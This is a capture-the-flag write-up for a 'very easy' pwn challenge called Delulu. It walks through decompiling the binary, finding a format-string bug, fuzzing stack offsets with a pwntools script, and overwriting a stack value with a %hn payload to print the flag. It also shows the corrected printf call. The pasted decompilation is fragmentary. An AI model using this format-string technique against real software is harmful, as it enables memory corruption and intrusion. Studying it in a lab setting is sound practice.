
# Delulu

## Description

> HALT! Recognition protocol initiated. Please present your face for scanning.
> [Attached file](https://github.com/JOvenOven/ctf-writeups/tree/main/Cyber_Apocalypse_2024_Hacker_Royale/pwn/delulu/challenge)

Tags: _Pwn_ \
Difficulty: _very easy_ \
Points: _300_

## Recognition phase

The first step for all challenges is to perform recognition tasks to assess the functionality and security posture of the application.

$ file delulu
delulu: ELF 64-bit LSB pie executable, x86-64, version 1 (SYSV), dynamically linked, interpreter ./glibc/ld-linux-x86-64.so.2, BuildID[sha1]=edae8c8bd5153e13fa60aa00f53071bb7b9a122f, for GNU/Linux 3.2.0, not stripped

$ checksec delulu
[*] '/home/jovenoven/Downloads/ctf/cyberApocalypse2024_HTB/pwn/delulu/delulu'
Arch: amd64-64-little
Stack: Canary found
NX: NX enabled
PIE: PIE enabled
RUNPATH: b'./glibc/'
Decompiling the binary with `Ghidra`:
/* decompilation from Ghidra */
undefined8 main(void)

long in_FS_OFFSET;
long local_48;
long *local_40;
undefined8 local_38;
undefined8 local_30;
undefined8 local_28;
undefined8 local_20;
long local_10;

local_10 = *(long *)(in_FS_OFFSET + 0x28);
local_48 = 0x1337babe;
local_40 = &local_48;
local_38 = 0;
local_30 = 0;
local_28 = 0;
local_20 = 0;
printf("\n[!] Checking.. ");
printf((char *)&local_38);
if (local_48 == 0x1337beef) {
else {
if (local_10 != *(long *)(in_FS_OFFSET + 0x28)) {
/* WARNING: Subroutine does not return */
return 0;

/* decompilation from Ghidra */
void delulu(void)

ssize_t sVar1;
long in_FS_OFFSET;
char local_15;
int local_14;
long local_10;

local_10 = *(long *)(in_FS_OFFSET + 0x28);
local_14 = open("./flag.txt",0);
if (local_14 < 0) {
perror("\nError opening flag.txt, please contact an Administrator.\n");
/* WARNING: Subroutine does not return */
printf("You managed to deceive the robot, here\'s your new identity: ");
while( true ) {
sVar1 = read(local_14,&local_15,1);
if (sVar1 < 1) break;
if (local_10 != *(long *)(in_FS_OFFSET + 0x28)) {
/* WARNING: Subroutine does not return */
In summary, ``main()`` function ask for an user input which is then printed back after the string `[!] Checking..`. We aim to execute the `delulu()` function, which prints the flag. This function is executed when the variable `local_48` equals `0x1337beef`, but that variable is never directly changed by the user.

## Finding the bug

We can identify the bug by analyzing the code and dynamically testing the binary:

A `Buffer Overflow (BOF)` bug exists because the variable `local_38` is 8 bytes long, but we can write up to 31 bytes to it. However, upon examining the stack layout provided by `Ghidra` for the `main()` function, we observe that the overwritten values are `local_30`, `local_28`, and `local_10`, rather than the return address or `local_48`, the variable we intend to overwrite. Therefore, we can rule out Buffer Overflow.

undefined main()
undefined AL:1 <RETURN>
undefined8 Stack[-0x10]:8 local_10

undefined8 Stack[-0x20]:8 local_20
undefined8 Stack[-0x28]:8 local_28
undefined8 Stack[-0x30]:8 local_30
undefined8 Stack[-0x38]:8 local_38

undefined8 Stack[-0x40]:8 local_40
undefined8 Stack[-0x48]:8 local_48

2. Testing `String Format Vulnerability` by inserting the printf format specifier `%p`

$ ./delulu


Try to deceive it by changing your ID.

>> %p %p %p %p

[!] Checking.. 0x7ffcbc2c1090 (nil) 0x7f8b15413887 0x10


The program does not display our input but instead prints stack pointers. This behavior indicates that the program is vulnerable to ``String Format Vulnerability``, a fact corroborated by the code itself. The user input is directly passed to the ``printf()`` function without a corresponding format specifier, which poses a security risk. That specific line of code should have been written as follows:
printf("%s", (char *)&local_38);

## Exploitation phase

To trigger the execution of the ``delulu()`` function, we must modify the value of ``local_48`` from ``0x1337babe`` to ``0x1337beef``. Exploiting the String Format Vulnerability allows us to overwrite memory values, including those referenced by variables on the stack. By identifying the offset in the stack of the ``local_40`` variable, which holds the address of our target ``local_48``, we can achieve that goal. The offset was determined using this fuzzing script:

from pwn import *

# This will automatically get context arch, bits, os etc
elf = context.binary = ELF('delulu', checksec=False)

# Let's fuzz 100 values
for i in range(1,100):
# Create process (level used to reduce noise)
p = process(level='error')
# When we see the user prompt '>', format the counter
# e.g. %2$s will attempt to print as a string the value
# pointed to by the second pointer in the stack
p.sendlineafter(b'> ', '%{}$s'.format(i).encode())
# Receive the response
p.recvuntil(b'.. ')
result = p.recvuntil(b'\n')
print(str(i) + ': ' + str(result))
# Exit the process
except EOFError:

$ python fuzz.py
1: b'\n'
2: b'(null)\n'
3: b'H=\n'
7: b'\xbe\xba7\x13\n'


The value ``0x1337babe`` is located at the 7th offset (displayed in little-endian byte format). With this information, we are now prepared to craft our final exploit which is as follows:
The format specifier ``%7$hn`` in the printf function instructs ``printf()`` to overwrite the least significant 2 bytes of the value pointed to by the pointer at offset 7 (our target string ``0x1337babe``). In this context, the value written is ``0xbeef``, which corresponds to the length of the output produced by the first part of our exploit ``A%48878x``. This initial part prints the argument 'A' padded with at least 48878 characters, effectively changing the value of ``local_48`` form ``0x1337babe`` to ``0x1337beef``.

Flag `HTB{m45t3r_0f_d3c3pt10n}`

Original writeup (https://github.com/JOvenOven/ctf-writeups/tree/main/Cyber_Apocalypse_2024_Hacker_Royale/pwn/delulu).